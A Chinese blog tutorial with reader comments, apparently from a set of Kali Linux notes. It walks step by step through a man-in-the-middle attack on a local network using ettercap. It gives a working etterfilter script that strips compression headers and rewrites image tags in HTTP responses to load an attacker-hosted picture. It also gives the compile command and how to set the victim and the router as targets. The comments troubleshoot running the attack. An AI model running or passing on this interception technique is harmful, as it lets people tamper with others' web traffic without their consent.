一:先准备一张图片
恩恩!低调点好!
我们将图片放大kali的var/www/html目录下
二:启动Apache
servce apache2 start
三:编写攻击脚本
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
#note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://192.168.5.209/img.jpg/&' ");
replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' ");
msg("过滤执行.\n");
}然后另存为alert.filter文件
四:将alert.filter转变为二进制文件
etterfilter alert.filter -o alert.ef
五:利用ettercap进行中间人攻击
将目标添加为1 路由器自身添加为2
然后我们载入刚才生成的脚本
然后开始中间人攻击
Kali笔记
14 comments
replace("img src=", "img src=http://192.168.5.209/img.jpg/&' ");
replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' ");
大佬 这个ip是不是要换成自己kali机器的ip啊
换成你的IP地址。只对http网站有效
请问图片是不是jpg格式的?并且重命名为img?
jpg 和png都行,名字随意!但是命令里面需要更改一样的名称!
(ettercap:13059): Gtk-WARNING **: 15:15:01.104: Attempting to set the permissions of `/root/.local/share/recently-used.xbel', but failed: 权限不够
我这个是怎么回事,怎么解决
用ROOT试试
0.8.3一样?
你试下http的网站可以不,不支持https的网站!?
过滤进行什么意思
发图我看
中间人攻击的话,是不是要在目标局域网里才行?
是的
如何将图片放到那个目录下?
调用图片的路径就行了!